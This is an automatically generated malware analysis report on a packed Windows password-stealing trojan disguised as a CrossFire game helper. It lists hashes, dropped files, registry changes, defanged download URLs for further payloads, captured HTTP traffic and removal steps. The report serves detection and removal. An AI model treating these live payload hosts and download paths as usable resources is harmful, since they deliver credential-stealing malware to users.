Susp_Dropper (Kaspersky), Gen:Variant.Strictor.115846 (B) (Emsisoft), Gen:Variant.Strictor.115846 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: da6afddc709bf99c8f44945efe6caf49
SHA1: 6bc754b750b8c077457f321b60694e216c534c14
SHA256: ca84817a5816452f053f16d916d545124974352dec483d2f3111d5ac085de4d9
SSDeep: 24576:ztZ CfrRGaFWn3ED YRojjzS08kTutqun8c9 1b6hL7jWOw4gyXSq1iUJL60CDq:zxcyCED7RwXisu8uUCTwiSq1560CDq
Size: 1651712 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-02-05 16:20:56
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
TcService.exe:2764
The Trojan injects its code into the following process(es):
sesvcs_963_56089.exe:1956
%original file name%.exe:3308
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process TcService.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
The process sesvcs_963_56089.exe:1956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)
The process %original file name%.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)
Registry activity
The process TcService.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process sesvcs_963_56089.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\QuestionASK\APP]
"AppPathName" = "%Program Files%\sesvcs_963_56089.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
15a43a47885c3eff331e97137c08343d | c:\CF_Helper.dll |
5c7c865bafa4600bf1aca0e60ed8fa5a | c:\Program Files\NamuADLook.dll |
d342bd6e4b881b21be18a02e2034b01a | c:\Program Files\sesvcs_963_56089.exe |
d342bd6e4b881b21be18a02e2034b01a | c:\Program Files\unstall000.exe |
ee904db75d49139181f892ac73859135 | c:\TcService.exe |
d342bd6e4b881b21be18a02e2034b01a | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt |
5c7c865bafa4600bf1aca0e60ed8fa5a | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll |
c472335b008c5942ec8a162177058111 | c:\exdui.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
TcService.exe:2764
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)
C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 3481600 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 3485696 | 1622016 | 1620992 | 5.54508 | 019f64b4e813b642777b432d389d114a |
.rsrc | 5107712 | 32768 | 29696 | 3.76085 | 57a8228ec969b9e72611e2e156647e31 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/ | 115.238.126.133 |
hxxp://blog.163.com/blog/static/26993501420171281319931/ | 115.238.126.133 |
hxxp://cdct.zhdns.net/aload/as/33.txt | |
hxxp://xzdownad.zglhsw.com/adpub//01.txt | 104.31.197.48 |
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll | 104.31.197.48 |
hxxp://publodf.kintip.com.cn/get_apis/paths/UPath0.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/urlv8_1.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/get_apis/kword/UContext1.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/DH/DHKW.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/ | 162.159.211.96 |
hxxp://down.9udn.com/aload/as/33.txt | 122.228.207.207 |
hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/ | 115.238.126.133 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:20 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
hXXp://xzdownad.zglhsw.com/adpub//01.txt
GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:08 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=414B2F0E31035AC3EA3D8B3BF0A191E4.yqblog15-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==; expires=Mon, 19-Feb-18 03:41:08 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
GET /get_apis/paths/UPath0.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:41 GMT
Content-Type: text/plain
Content-Length: 708
Connection: keep-alive
Set-Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701; expires=Mon, 19-Feb-18 03:41:41 GMT; path=/; domain=.kintip.com.cn; HttpOnly
Last-Modified: Fri, 17 Feb 2017 13:16:47 GMT
Accept-Ranges: bytes
ETag: "e491d6172089d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b45da0ec5990-VIE
GET /get_apis/paths/lists/urlv8_1.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:42 GMT
Content-Type: text/plain
Content-Length: 52692
Connection: keep-alive
Last-Modified: Sat, 18 Feb 2017 07:54:41 GMT
Accept-Ranges: bytes
ETag: "80768442bc89d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b461a15c5990-VIE
GET /get_apis/kword/UContext1.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:43 GMT
Content-Type: text/plain
Content-Length: 12412
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:36:36 GMT
Accept-Ranges: bytes
ETag: "b07def1e9edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b469625b5990-VIE
GET /get_apis/paths/lists/DH/DHKW.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:46 GMT
Content-Type: text/plain
Content-Length: 103236
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:37:06 GMT
Accept-Ranges: bytes
ETag: "2d4a3309edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b476c3f45990-VIE
GET / HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Content-Location: hXXp://publodf.kintip.com.cn/iisstart.htm
Last-Modified: Wed, 21 Dec 2016 05:14:24 GMT
ETag: "2c246518495bd21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b484d5935990-VIE
HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Set-Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681; expires=Mon, 19-Feb-18 03:41:21 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e146ed59ae-VIE
GET /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e5d77359ae-VIE
HEAD /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:29 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b413e45159ae-VIE
GET /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:30 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b41634a559ae-VIE
HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:16 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
GET /blog/static/26993501420171281319931/ HTTP/1.1
Accept: */*
Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: baike2016.blog.163.com
Cache-Control: no-cache
Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:14 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=6940DB1C86E784EA6CBDE5BD19B3ED96.yqblog8-8010; Domain=.blog.163.com; Path=/
Strings from Dumps
%original file name%.exe_3308:
`.rsrc
).pU
t$(SSh
~%UVW
u$SShe
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
ntdll.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetProcessHeap
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
[VVV.111Ttt.com]
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
wW.Gg
wW.Gg
NA EE9KR?WC [I7WT
NA EE9KR?WC [I7WT
NA FE9KR?WC [I7WT
NA FE9KR?WC [I7WT
Z|.Gw
Z|.Gw
MA,FE9KR?WC*[I7WT
MA,FE9KR?WC*[I7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,EE9KR?WC*ZI7WT
MA,EE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
l.er;
l.er;
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
8`!%x
8`!%x
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
